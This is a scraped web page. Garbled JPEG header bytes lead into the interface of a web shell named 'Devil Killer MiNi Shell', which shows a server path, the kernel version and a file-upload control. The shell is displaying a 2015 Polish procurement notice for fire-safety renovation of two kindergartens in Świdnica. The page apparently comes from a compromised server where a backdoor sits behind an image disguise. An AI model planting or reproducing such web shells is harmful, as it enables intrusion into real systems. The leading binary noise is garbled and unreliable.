JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150423/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150423/57403-N-2015.html

<p class="kh_header"><b>Świdnica: Wykonanie robót budowlanych, w ramach zadania inwestycyjnego pn.: Przebudowa budynków Przedszkola Miejskiego Nr 4 i Przedszkola Miejskiego Nr 14  w zakresie dostosowania do wymogów bezpieczeństwa pożarowego:
obejmującego:

            Zadanie 1.  Przebudowa budynku Przedszkola Miejskiego nr 4 w Świdnicy w zakresie dostosowania do    wymogów bezpieczeństwa pożarowego.

          Zadanie 2 . Przebudowa budynku Przedszkola Miejskiego nr 14 w Świdnicy w zakresie dostosowania do   wymogów bezpieczeństwa pożarowego.</b><br>
<b>Numer ogłoszenia: 57403 - 2015; data zamieszczenia: 23.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Świdnicy , ul. Armii Krajowej 49, 58-100 Świdnica, woj. dolnośląskie, tel. 074 8562850, faks 074 8523110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swidnica.bip-gov.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych, w ramach zadania inwestycyjnego pn.: Przebudowa budynków Przedszkola Miejskiego Nr 4 i Przedszkola Miejskiego Nr 14  w zakresie dostosowania do wymogów bezpieczeństwa pożarowego:
obejmującego:

            Zadanie 1.  Przebudowa budynku Przedszkola Miejskiego nr 4 w Świdnicy w zakresie dostosowania do    wymogów bezpieczeństwa pożarowego.

          Zadanie 2 . Przebudowa budynku Przedszkola Miejskiego nr 14 w Świdnicy w zakresie dostosowania do   wymogów bezpieczeństwa pożarowego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.	OPIS PRZEDMIOTU ZAMÓWIENIA.
3.1.	Przedmiotem zamówienia są roboty budowlane w ramach zadania inwestycyjnego pn.:
Przebudowa budynków Przedszkola Miejskiego Nr 4 i Przedszkola Miejskiego Nr 14  
w zakresie dostosowania do wymogów bezpieczeństwa pożarowego
obejmująca: zadania pn.:
Zadanie 1.  Przebudowa budynku Przedszkola Miejskiego nr 4 w Świdnicy w zakresie dostosowania do    wymogów bezpieczeństwa pożarowego.
Zadanie 2 . Przebudowa budynku Przedszkola Miejskiego nr 14 w Świdnicy w zakresie dostosowania do   wymogów bezpieczeństwa pożarowego.
3.2.	Szczegółowy opis przedmiotu zamówienia. 
Zadanie 1 .  Przebudowa budynku Przedszkola Miejskiego nr 4 w Świdnicy w zakresie dostosowania do    wymogów bezpieczeństwa pożarowego.
Celem realizacji zadania jest dostosowanie budynku Przedszkola Miejskiego nr 4 do wymogów bezpieczeństwa pożarowego. Funkcja budynku bez zmian. Dla potrzeb spełnienia wymagań bezpieczeństwa pożarowego przewidziano korektę wewnętrznego układu komunikacji poprzez wydzielenie klatki schodowej ściankami ogniochronnymi o REI60 z przeszkleniami EI60 na parterze, na I piętrze i poddaszu. 
W wydzielonej klatce schodowej należy zamontować  dwa okna  połaciowe  z funkcją klapy oddymiającej. 
W części pomieszczeń zastosowano drzwi ppoż.
Ponadto przewiduje się wykonanie: 
-Instalacji hydrantowej wodnej ppoż. z hydrantami na każdej kondygnacji.
-Wymianę w instalacji oświetlenia ewakuacyjnego opraw awaryjnych o natężeniu 1lx na oprawy o natężeniu 2lx wraz z okablowaniem.
-Instalacji oddymiania klatki schodowej.
-Zamontowanie czujek dymu w pomieszczeniach komunikacyjnych.
-Zgodnie z Warunkami technicznymi Nr TI-403/426/2012 z dnia 13.11.2012r. przewidziano wymianę istniejącego wodociągu o32 na wodociąg z rur PE50  SDR11. Na przyłączu zamontować należy zasuwę żeliwną kołnierzową dn50. Przyłącze krzyżuje się z uzbrojeniem podziemnym tj. kablem eANN.  Przyłącze przebiega w odległości ~1,00m od istniejącego drzewa. Na tym odcinku wykop wykonywać ręcznie a istniejące korzenie zabezpieczyć przed uszkodzeniem. Przebieg przyłącza pokazano na mapie, rzucie piwnic oraz profilu. Po wykonaniu instalację należy zdezynfekować oraz poddać próbie ciśnienia i szczelności zgodnie z wymogami normy  PN=81/B-10725 na ciśnienie nie mniejsze niż 1,0Mpa oraz zamontować zawór antyskażeniowy . Wykonaną instalację wodociągową przed zasypaniem należy zgłosić do odbioru   ŚPWiK  w Świdnicy 
i uzyskać pozytywny protokół odbioru.
-Wykonawca ujmie w ofercie odtworzenie nawierzchni istniejącego chodnika  po wykonywanych robotach podczas wymiany przyłącza wod-kan.
-Wykonawca ujmie w ofercie odtworzenie pokrycia połaci dachowych po zakończonych robotach montażowych okien dachowych materiałem identycznym do istniejącego (certyfikat na rodzaj materiałów zastosowanych przy wykonywaniu połaci dachowych dodano do załączników niniejszej SIWZ).
-Wykonawca ujmie w ofercie malowanie poręczy  na klatce schodowej. 
Zadanie 2 .  Przebudowa budynku Przedszkola Miejskiego nr 14 w Świdnicy w zakresie dostosowania do   wymogów bezpieczeństwa pożarowego.
Celem realizacji zadania jest dostosowanie budynku Przedszkola Miejskiego nr 14 do wymogów bezpieczeństwa pożarowego. Układ funkcjonalny budynku pozostaje bez zmian. Dojazd gospodarczy bez zmian. Przewidywane roboty remontowo-modernizacyjne będą wykonywane metodą tradycyjną. Zakłada się następujące roboty obejmujące poszczególne elementy budynku:
-Na parterze po demontażu istniejących drzwi zastosowanie w ich miejsce nowych drzwi  70/200 ppoż.  wewnętrznych do piwnicy jednoskrzydłowych,  metalowych laminowanych, ocieplonych, 
z samozamykaczem, z pasem dolnym zabezpieczonym fabrycznie blachą nierdzewną grub.  0,5 mm szerokości 15 cm; spełniających wymagania klasy EI30.
-W pomieszczeniu w szatni (pom. 1.5.), holu (pom.1.2.) oraz korytarzu (pom. 2.2.) przewiduje się ułożenie wykładziny PCV trudno zapalnej posiadającej odpowiedni atest o trudno zapalności po uprzednim demontażu istniejącej wykładziny PCV.  
-Wykonać tynki cem-wap. kat.IV na ścianach  pomieszczeń szatni (pom. 1.5.), holu (pom. 1.2.), przedsionka (pom. 1.1.), z których zdemontowano boazerię z drewna. W części komunikacyjnej narożniki ścian należy zabezpieczyć aluminiowymi narożnikami ochronnymi podtynkowymi przed uszkodzeniami mechanicznymi. 
-Pomalowanie farbami o zwiększonej odporności (np. lateksowymi) - na całą wysokość pomieszczenia w jasnym kolorze ścian pomieszczenia parteru: szatni (pom. 1.5.), holu (pom. 1.2.), przedsionka (pom. 1.1.),  i I piętra: korytarza  (pom. 2.2.). 
Ponadto przewiduje się wykonanie: 
-Wymiany  wszystkich hydrantów na parterze i I piętrze w istniejącej instalacji hydrantowej wodnej ppoż.
-Instalacji elektrycznej oświetlenia ewakuacyjnego.
-Instalacji sygnalizacji pożaru.
-Zamontowanie  wyłącznika prądu ppoż. 
 Dodatkowo Wykonawca ujmie w ofercie:
-Wymianę drzwi zewnętrznych  klatki bocznej.
-Wymianę wykładziny na klatce schodowej  (pom. 2.1.) na wykładzinę posiadającą atest o trudno zapalności. 
-Malowanie balustrady schodowej. 
Szczegółowy opis przedmiotu zamówienia dla poszczególnych zadań zawarty jest w dokumentacji projektowej tj. projekcie budowlanym, wykonawczym, szczegółowej specyfikacji technicznej wykonania i odbioru robót, przedmiarze robót autorstwa Spółki Inwestycyjno - Budowlanej Biodom Sp. z o.o. z siedzibą w Dzierżoniowie oraz ekspertyzie technicznej rzeczoznawcy budowlanego i rzeczoznawcy ds. zabezpieczeń przeciwpożarowych mgr inż. Grzegorza Kułaka. 

3.3.	Załączone do dokumentacji projektowej przedmiary robót nie stanowią opisu przedmiotu zamówienia. Załączone  są  w celu ułatwienia dokonania wyceny oferty przez Wykonawcę. Przedmiarów nie należy wypełniać ani załączać do oferty. 
3.4.	Wykonawca zobowiązuje się wykonać roboty budowlane, które nie zostały wyszczególnione w przedmiarze robót, a są konieczne do realizacji przedmiotu umowy zgodnie z projektem budowlanym, wykonawczym, szczegółową specyfikacją techniczną wykonania i odbioru robót, zapisami SIWZ oraz zgodnie z obowiązującymi przepisami prawa a w szczególności ustawą Prawo Budowlane (Dz. U. z  2013r. Poz.1409) oraz rozporządzeniami powiązanymi. 
3.5.	W przypadku rozbieżności w ustaleniach poszczególnych dokumentów, obowiązuje następująca kolejność ich ważności:
1. Specyfikacja Techniczna Wykonania i Odbioru Robót,
2.Projekt Wykonawczy,
3. Projekt Budowlany,
4. Ekspertyza Techniczna rzeczoznawcy budowlanego i rzeczoznawcy ds. zabezpieczeń przeciwpożarowych,
3.6.	Wykonawca zobowiązany jest do wykonywania robót budowlanych w budynkach tylko po godzinach pracy przedszkoli, w dni wolne od pracy oraz w godzinach  popołudniowych i nocnych (nie zakłócając ciszy nocnej) tak, aby nie zakłócać normalnego funkcjonowania przedszkoli. Przedmiotowe prace prowadzone będą w obiekcie czynnym.
3.7.	Przedmiot zamówienia obejmuje również aktualizację posiadanych przez Użytkowników instrukcji w sprawie zasad ewakuacji oraz planów ewakuacji.
3.8.	Przedmiot zamówienia obejmuje tynkowanie i malowanie ścian i sufitów po przekuciach 
i przemurowaniach otworów okiennych i drzwiowych oraz w miejscach prowadzenia wszelkich przewodów pod tynk (przewody należy prowadzić w bruzdach). 
3.9.	Nazwy i kody dotyczące przedmiotu zamówienia określone we Wspólnym Słowniku Zamówień Publicznych (CPV):
45100000-8 - przygotowanie terenu pod budowę
45200000-9 - roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej
45300000-0 - roboty w zakresie instalacji budowlanych
45400000-1 - roboty wykończeniowe w zakresie obiektów budowlanych
 
4.	TERMIN WYKONANIA ZAMÓWIENIA.
4.1.	Wymagany termin realizacji zadania:
4.1.1.    Zadanie nr 1 
a)	Rozpoczęcie realizacji:  od dnia podpisania umowy,
b)	Zakończenie realizacji   do 25 sierpnia 2015 r. 
4.1.2.    Zadanie 2
a)	  Rozpoczęcie realizacji:  od dnia podpisania umowy,
b)    Zakończenie realizacji:  do 25 sierpnia  2015 r..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.20.00.00-9, 45.30.00.00-0, 45.40.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 9.	WYMAGANIA DOTYCZĄCE WADIUM.
9.1.	Oferta na każde zadanie  powinna być zabezpieczona wadium w wysokości  3.000,00 zł (słownie: trzy tysiące złotych)
9.2.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert. 
9.3.	Wadium może być wniesione w formach określonych w art.45 ust.6 ustawy Pzp, z tym, że:
a/ złożone w pieniądzu: przelewem na rachunek bankowy Zamawiającego w Banku PKO S.A. I Oddział w Świdnicy 96 1240 1978 1111 0010 0166 5724. Kwota wadium wniesiona przelewem winna znaleźć się na rachunku bankowym Zamawiającego przed upływem terminu składania ofert.
b/ złożone w gwarancjach (bankowych, ubezpieczeniowych):
z treści gwarancji winno wynikać bezwarunkowo, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych art. 46 ust. 5 i 4a ustawy Pzp tj. w przypadku, gdy Wykonawca:
-	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych 
w ofercie,
-	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
-	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, oraz:
-	w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 z przyczyn leżących po jego stronie , nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa  w art. 87 ust.2 pkt. 3, co powodowało  brak możliwości wybrania oferty złożonej przez  Wykonawcę  jako najkorzystniejszej.
9.4.	W przypadku wadium wnoszonego w pieniądzu za skutecznie wniesione Zamawiający uzna wadium, które w oznaczonym terminie w dniu otwarcia ofert znajduje się na rachunku Zamawiającego.
9.5.	Wszystkie formy wadium powinny mieć określoną ważność zgodną z okresem związania ofertą. Bieg terminu związania ofertą rozpoczyna się wraz z upływem terminu składania ofert.
9.6.	Złożone w innej niż pieniądz formie winno być złożone w kasie Zamawiającego, jako depozyt, złożony za potwierdzeniem, przed upływem terminu składania ofert. 
9.7.	Dowód przelewu lub potwierdzenie depozytu należy dołączyć w oryginale do oferty. 
9.8.	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana, jako najkorzystniejsza, z zastrzeżeniem jak w pkt 9.12.
9.9.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
9.10.	Zamawiający zwraca wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
9.11.	Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie, pkt 9.8 jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana, jako najkorzystniejsza. Wykonawca wniesie wadium w terminie określonym przez Zamawiającego. 
9.12.	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1 ustawy Pzp, lub pełnomocnictw chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
9.13.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a/	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych 
w ofercie,
b/	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c/	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
d/	w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3   z przyczyn leżących po jego stronie , nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1,  pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa  w art. 87 ust.2 pkt. 3, co powodowało  brak możliwości wybrania oferty złożonej przez  Wykonawcę  jako najkorzystniejszej.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek dotyczący posiadania wiedzy i doświadczenia został spełniony, jeżeli Wykonawca wykaże się wykonaniem w okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie):
6.1.2.1.	Zadanie 1: Co najmniej 1 roboty budowlanej polegającej na wykonaniu robót budowlano remontowych obiektu użyteczności publicznej zawierającej  między innymi roboty budowlane,  montaż stolarki drzwiowej i okiennej, towarzyszące roboty instalacyjne wodociągowe i kanalizacyjne o wartości nie mniejszej  
niż 100.000,00 PLN netto  oraz 1 roboty budowlanej polegającej na wykonaniu lub wymianie instalacji sygnalizacji pożaru lub instalacji oświetlenia ewakuacyjnego 
o wartości nie mniejszej niż 5.000,00 PLN netto, wraz z załączeniem dowodów dotyczących tych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej 
i prawidłowo ukończone.
6.1.2.2.	Zadanie 2: Co najmniej 1 roboty budowlanej polegającej na wykonaniu robót budowlano remontowych obiektu użyteczności publicznej zawierającej  między innymi roboty budowlane,  montaż stolarki drzwiowej i okiennej, towarzyszące roboty instalacyjne wodociągowe i kanalizacyjne o wartości nie mniejszej niż 50.000,00 PLN netto  oraz 1 roboty budowlanej polegającej na wykonaniu lub wymianie instalacji sygnalizacji pożaru lub instalacji oświetlenia ewakuacyjnego o wartości nie mniejszej niż 2.000,00 PLN netto, wraz z załączeniem dowodów dotyczących tych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia został spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia posiadającymi uprawnienia do pełnienia samodzielnych funkcji technicznych, odpowiednio do kierowania robotami budowlanymi w specjalnościach zarówno dla Zadania 1 i dla Zadania 2:
-   konstrukcyjno-budowlanej: osoba pełniąca funkcję kierownika budowy;
-   instalacyjnej w zakresie sieci, instalacji i urządzeń: wodociągowych i kanalizacyjnych, 
    cieplnych,  wentylacyjnych i gazowych: osoba pełniąca funkcję kierownika robót 
    branży instalacji sanitarnych;
-  instalacyjnej w zakresie sieci i urządzeń elektrycznych i energetycznych: osoba 
    pełniąca funkcję kierownika robót branży instalacji elektrycznych;
wydane zgodnie z Rozporządzeniem Ministra Transportu i Budownictwa z dn. 28 kwietnia 2006 roku w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. Nr 83 poz. 578 ze zm.) należącym do właściwej Izby lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane oraz ustawy z dnia 18 marca 2008 roku o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r., Nr 63, poz. 394),
Wskazane powyżej osoby powinny posiadać minimum 3 letnie doświadczenie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek dotyczący sytuacji ekonomicznej i finansowej został spełniony, jeżeli Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 100 tys. PLN (słownie: sto tysięcy złotych) na każde zadanie oraz posiada środki finansowe lub zdolność kredytową w wysokości min.100 tys. PLN (słownie: sto tysięcy złotych) na każde zadanie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Zamawiający uzna, że warunek dotyczący posiadania wiedzy i doświadczenia został spełniony, jeżeli Wykonawca wykaże się wykonaniem w okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie):
6.1.2.1.	Zadanie 1: Co najmniej 1 roboty budowlanej polegającej na wykonaniu robót budowlano remontowych obiektu użyteczności publicznej zawierającej  między innymi roboty budowlane,  montaż stolarki drzwiowej i okiennej, towarzyszące roboty instalacyjne wodociągowe i kanalizacyjne o wartości nie mniejszej  
niż 100.000,00 PLN netto  oraz 1 roboty budowlanej polegającej na wykonaniu lub wymianie instalacji sygnalizacji pożaru lub instalacji oświetlenia ewakuacyjnego 
o wartości nie mniejszej niż 5.000,00 PLN netto, wraz z załączeniem dowodów dotyczących tych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej 
i prawidłowo ukończone.
6.1.2.2.	Zadanie 2: Co najmniej 1 roboty budowlanej polegającej na wykonaniu robót budowlano remontowych obiektu użyteczności publicznej zawierającej  między innymi roboty budowlane,  montaż stolarki drzwiowej i okiennej, towarzyszące roboty instalacyjne wodociągowe i kanalizacyjne o wartości nie mniejszej niż 50.000,00 PLN netto  oraz 
1 roboty budowlanej polegającej na wykonaniu lub wymianie instalacji sygnalizacji pożaru lub instalacji oświetlenia ewakuacyjnego o wartości nie mniejszej niż 2.000,00 PLN netto, wraz z załączeniem dowodów dotyczących tych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie 
z zasadami sztuki budowlanej i prawidłowo ukończone.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

